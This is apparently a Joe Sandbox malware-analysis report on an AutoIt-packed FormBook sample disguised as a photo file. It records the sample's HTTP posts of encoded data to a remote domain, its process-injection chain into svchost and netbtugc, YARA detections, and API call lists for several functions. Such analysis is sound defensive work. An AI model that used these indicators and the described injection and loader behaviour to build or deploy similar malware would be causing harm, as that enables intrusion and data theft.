59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 5a 48 52 77 54 63 55 41 44 7a 42 54 6f 52 4a 54 63 68 49 45 74 30 63 68 71 32 71 7a 77 76 30 56 33 54 79 52 67 48 32 39 51 2b 79 2b 59 56 74 34 7a 47 47 72 65 63 67 69 43 44 31 66 59 6d 46 69 45 2f 74 56 4c 51 62 30 48 32 35 48 55 4e 55 56 67 69 59 65 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DZHRwTcUADzBToRJTchIEt0chq2qzwv0V3TyRgH29Q+y+YVt4zGGrecgiCD1fYmFiE/tVLQb0H25HUNUVgiYeA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Aug 12, 2024 13:04:16.122755051 CEST	559	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTJhNDljOGUtZDZlNi00ODIzLTgwZmMtMGJkMTUyZWZjMjBjIiwicGFnZV90aW1lIjoxNzIzNDYwNj

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.6	54875	199.59.243.226	80

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:04:19.549057007 CEST	793	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.joyesi.xyz Origin: http://www.joyesi.xyz Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 231 Referer: http://www.joyesi.xyz/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 31 68 42 4b 38 75 43 4f 6e 30 4f 36 48 31 69 79 30 5a 4a 78 56 50 48 47 53 6a 46 4b 62 6b 49 54 68 37 37 79 57 38 4e 6d 56 45 58 48 54 41 2f 73 74 6a 62 2f 78 37 64 54 79 6a 55 45 67 4a 4d 7a 76 53 54 4d 4b 58 7a 38 6d 75 33 61 66 44 4d 36 38 6a 4e 52 71 71 62 4f 6a 59 5a 67 6e 41 4e 34 34 6b 67 39 6c 49 46 2f 73 6e 43 65 70 54 67 63 74 45 74 49 66 68 38 68 51 50 55 61 77 75 5a 65 59 4a 42 55 31 54 6e 54 63 70 4a 37 46 42 4f 47 59 39 5a 54 4d 7a 38 42 76 50 72 57 62 71 75 74 48 7a 59 6e 4b 79 72 37 66 55 54 74 36 45 64 6c 4c 63 39 38 47 47 55 6a 64 44 34 39 43 6f 32 5a 77 30 6d 53 73 6b 42 54 4d 67 4d 69 72 47 56 79 75 4e 65 50 47 70 78 34 38 63 7a 76 54 65 37 62 76 67 3d 3d Data Ascii: wP=1hBK8uCOn0O6H1iy0ZJxVPHGSjFKbkITh77yW8NmVEXHTA/stjb/x7dTyjUEgJMzvSTMKXz8mu3afDM68jNRqqbOjYZgnAN44kg9lIF/snCepTgctEtIfh8hQPUawuZeYJBU1TnTcpJ7FBOGY9ZTMz8BvPrWbqutHzYnKyr7fUTt6EdlLc98GGUjdD49Co2Zw0mSskBTMgMirGVyuNePGpx48czvTe7bvg==
Aug 12, 2024 13:04:20.034641981 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 12 Aug 2024 11:04:19 GMT content-type: text/html; charset=utf-8 content-length: 1106 x-request-id: b1e8c7ff-ebbf-4ab5-8d68-80cca1ac8851 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DZHRwTcUADzBToRJTchIEt0chq2qzwv0V3TyRgH29Q+y+YVt4zGGrecgiCD1fYmFiE/tVLQb0H25HUNUVgiYeA== set-cookie: parking_session=b1e8c7ff-ebbf-4ab5-8d68-80cca1ac8851; expires=Mon, 12 Aug 2024 11:19:19 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 5a 48 52 77 54 63 55 41 44 7a 42 54 6f 52 4a 54 63 68 49 45 74 30 63 68 71 32 71 7a 77 76 30 56 33 54 79 52 67 48 32 39 51 2b 79 2b 59 56 74 34 7a 47 47 72 65 63 67 69 43 44 31 66 59 6d 46 69 45 2f 74 56 4c 51 62 30 48 32 35 48 55 4e 55 56 67 69 59 65 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DZHRwTcUADzBToRJTchIEt0chq2qzwv0V3TyRgH29Q+y+YVt4zGGrecgiCD1fYmFiE/tVLQb0H25HUNUVgiYeA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Aug 12, 2024 13:04:20.034663916 CEST	559	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjFlOGM3ZmYtZWJiZi00YWI1LThkNjgtODBjY2ExYWM4ODUxIiwicGFnZV90aW1lIjoxNzIzNDYwNj

Target ID:	0
Start time:	07:00:08
Start date:	12/08/2024
Path:	C:\Users\user\Desktop\rPHOTO09AUG2024.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\rPHOTO09AUG2024.exe"
Imagebase:	0xd40000
File size:	1'273'856 bytes
MD5 hash:	6440CECCBBDEC781207B92203D4161F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:00:09
Start date:	12/08/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\rPHOTO09AUG2024.exe"
Imagebase:	0x4e0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2316109187.0000000007000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2316109187.0000000007000000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2315423366.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2315423366.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2315722372.0000000003510000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2315722372.0000000003510000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:00:17
Start date:	12/08/2024
Path:	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe"
Imagebase:	0x2c0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4641065257.0000000005F60000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4641065257.0000000005F60000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	07:00:18
Start date:	12/08/2024
Path:	C:\Windows\SysWOW64\netbtugc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\netbtugc.exe"
Imagebase:	0x300000
File size:	22'016 bytes
MD5 hash:	EE7BBA75B36D54F9E420EB6EE960D146
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4641575979.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4641575979.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4641284738.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4641284738.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4631777519.0000000002360000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4631777519.0000000002360000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	07:00:32
Start date:	12/08/2024
Path:	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe"
Imagebase:	0x2c0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4643559111.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4643559111.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	07:00:43
Start date:	12/08/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	5%
Total number of Nodes:	2000
Total number of Limit Nodes:	61

Executed Functions

Function 00D43B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00D43B7A
IsDebuggerPresent.KERNEL32 ref: 00D43B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,00E062F8,00E062E0,?,?), ref: 00D43BFD

Part of subcall function 00D47D2C: _memmove.LIBCMT ref: 00D47D66

Part of subcall function 00D50A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00D43C26,00E062F8,?,?,?), ref: 00D50ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 00D43C81
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00DF93F0,00000010), ref: 00D7D4BC
SetCurrentDirectoryW.KERNEL32(?,00E062F8,?,?,?), ref: 00D7D4F4
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00DF5D40,00E062F8,?,?,?), ref: 00D7D57A
ShellExecuteW.SHELL32(00000000,?,?), ref: 00D7D581

Part of subcall function 00D43A58: GetSysColorBrush.USER32(0000000F), ref: 00D43A62
Part of subcall function 00D43A58: LoadCursorW.USER32(00000000,00007F00), ref: 00D43A71
Part of subcall function 00D43A58: LoadIconW.USER32(00000063), ref: 00D43A88
Part of subcall function 00D43A58: LoadIconW.USER32(000000A4), ref: 00D43A9A
Part of subcall function 00D43A58: LoadIconW.USER32(000000A2), ref: 00D43AAC
Part of subcall function 00D43A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D43AD2
Part of subcall function 00D43A58: RegisterClassExW.USER32(?), ref: 00D43B28

Part of subcall function 00D439E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D43A15
Part of subcall function 00D439E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D43A36
Part of subcall function 00D439E7: ShowWindow.USER32(00000000,?,?), ref: 00D43A4A
Part of subcall function 00D439E7: ShowWindow.USER32(00000000,?,?), ref: 00D43A53

Part of subcall function 00D443DB: _memset.LIBCMT ref: 00D44401
Part of subcall function 00D443DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D444A6

Strings

runas, xrefs: 00D7D575
This is a third-party compiled AutoIt script., xrefs: 00D7D4B4

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: 763f82aac091e63a8a13a938bdbeb3c6e0702a4ba391e84790f69e050c7d1108
Instruction ID: 834895d6810db0e9d1d2d9d93a2ce6f648c51a855aa06e5ee90bd2dc2779e9cb
Opcode Fuzzy Hash: 763f82aac091e63a8a13a938bdbeb3c6e0702a4ba391e84790f69e050c7d1108
Instruction Fuzzy Hash: 6151D230D0424AAFCF11ABB8DC46FED7B79EF45300B048165F895B22A1DB759A99CB31

Function 00D44AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00D44B2B

Part of subcall function 00D47D2C: _memmove.LIBCMT ref: 00D47D66

GetCurrentProcess.KERNEL32(?,00DCFAEC,00000000,00000000,?), ref: 00D44BF8
IsWow64Process.KERNEL32(00000000), ref: 00D44BFF
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00D44C45
FreeLibrary.KERNEL32(00000000), ref: 00D44C50
GetSystemInfo.KERNEL32(00000000), ref: 00D44C81
GetSystemInfo.KERNEL32(00000000), ref: 00D44C8D

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 7197b2c645f4c763ccc88d3ea07a1d9d81023422b2ec0c575eb78ce10197ead1
Instruction ID: 78eb31304430bfa805924b4515f92072c73047eee4ff68733273a84e878a0a4f
Opcode Fuzzy Hash: 7197b2c645f4c763ccc88d3ea07a1d9d81023422b2ec0c575eb78ce10197ead1
Instruction Fuzzy Hash: 4791A33154A7C1DFC731CB6885916AABFF5AF2A300B4C899ED0CA93B41D220E948C779

Function 00D44FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00D44EEE,?,?,00000000,00000000), ref: 00D44FF9
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00D44EEE,?,?,00000000,00000000), ref: 00D45010
LoadResource.KERNEL32(?,00000000,?,?,00D44EEE,?,?,00000000,00000000,?,?,?,?,?,?,00D44F8F), ref: 00D7DD60
SizeofResource.KERNEL32(?,00000000,?,?,00D44EEE,?,?,00000000,00000000,?,?,?,?,?,?,00D44F8F), ref: 00D7DD75
LockResource.KERNEL32(00D44EEE,?,?,00D44EEE,?,?,00000000,00000000,?,?,?,?,?,?,00D44F8F,00000000), ref: 00D7DD88

Strings

SCRIPT, xrefs: 00D45006

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 9b8344ecf27800caa950d350ca6a58136a80bd644bc8c57bd0c890c8c91949fc
Instruction ID: ed2791b72c6533588a9d3260516f12f1e831fe0d1a412820b5c52122de36ff40
Opcode Fuzzy Hash: 9b8344ecf27800caa950d350ca6a58136a80bd644bc8c57bd0c890c8c91949fc
Instruction Fuzzy Hash: 4D115E75240702AFD7218B65EC58F67BBBEEBC9B11F14416CF406C6260DB61EC008670

Function 00D4E800 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00D8428C
Dt, xrefs: 00D83F58
Dt, xrefs: 00D4EC1A
Dt, xrefs: 00D83F1F
Dt, xrefs: 00D4EC21

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID:
String ID: Dt$Dt$Dt$Dt$Variable must be of type 'Object'.
API String ID: 0-3952547859
Opcode ID: 8f1c4aa73004f19b3a7f7a841728c2867f38c05174bec52592cd0a574aa8094d
Instruction ID: eef87b07dd988e71cb0a411f0fd3885fdd905af6c2657527d61b824dac4e810a
Opcode Fuzzy Hash: 8f1c4aa73004f19b3a7f7a841728c2867f38c05174bec52592cd0a574aa8094d
Instruction Fuzzy Hash: B1A27C74E04206DFCB24DF58C480AAEB7B1FF48310F288169E956AB351D775ED86CBA1

Function 00DA4696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00D7E7C1), ref: 00DA46A6
FindFirstFileW.KERNELBASE(?,?), ref: 00DA46B7
FindClose.KERNEL32(00000000), ref: 00DA46C7

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 1cce6cd0794ec7b62fbc5ce4a1f261683bb3db07a03cd213a704f9ddc89f415f
Instruction ID: a7fc071cc90a50c2c9002988c21d6e8fac4cb1a41939bfcd7f30f3950854c160
Opcode Fuzzy Hash: 1cce6cd0794ec7b62fbc5ce4a1f261683bb3db07a03cd213a704f9ddc89f415f
Instruction Fuzzy Hash: E4E0D8324109026B42106738EC4D8EAB75DDE47335F140715F835C11E0E7F0995085B9

Function 00D50B30 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D50BBB
timeGetTime.WINMM ref: 00D50E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D50FB3
TranslateMessage.USER32(?), ref: 00D50FC7
DispatchMessageW.USER32(?), ref: 00D50FD5
Sleep.KERNEL32(0000000A), ref: 00D50FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 00D5105A
DestroyWindow.USER32 ref: 00D51066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D51080
Sleep.KERNEL32(0000000A,?,?), ref: 00D852AD
TranslateMessage.USER32(?), ref: 00D8608A
DispatchMessageW.USER32(?), ref: 00D86098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D860AC

Strings

@GUI_CTRLHANDLE, xrefs: 00D8540E
@GUI_WINHANDLE, xrefs: 00D853B9
pr, xrefs: 00D85BDE
pr, xrefs: 00D8542D
pr, xrefs: 00D853D8
pr, xrefs: 00D85383
@TRAY_ID, xrefs: 00D85BB9
@GUI_CTRLID, xrefs: 00D85364
@COM_EVENTOBJ, xrefs: 00D8591A

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pr$pr$pr$pr
API String ID: 4003667617-1825247661
Opcode ID: 7269d212ef3028dbb82681b308f1eb6f0506b4b4329d7cea881dd6626a173fa0
Instruction ID: 0ee1677c6f4c1a9c6fe87946b6739a481dfa0fba01de95bc37e785d7e9a28d2f
Opcode Fuzzy Hash: 7269d212ef3028dbb82681b308f1eb6f0506b4b4329d7cea881dd6626a173fa0
Instruction Fuzzy Hash: 45B28070608741DFDB24DF24D885BAABBE5FF84304F18491DE89997291DB71E848CBB2

Function 00DA93DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DA91E9: __time64.LIBCMT ref: 00DA91F3

Part of subcall function 00D45045: _fseek.LIBCMT ref: 00D4505D

__wsplitpath.LIBCMT ref: 00DA94BE

Part of subcall function 00D6432E: __wsplitpath_helper.LIBCMT ref: 00D6436E

_wcscpy.LIBCMT ref: 00DA94D1
_wcscat.LIBCMT ref: 00DA94E4
__wsplitpath.LIBCMT ref: 00DA9509
_wcscat.LIBCMT ref: 00DA951F
_wcscat.LIBCMT ref: 00DA9532

Part of subcall function 00DA922F: _memmove.LIBCMT ref: 00DA9268
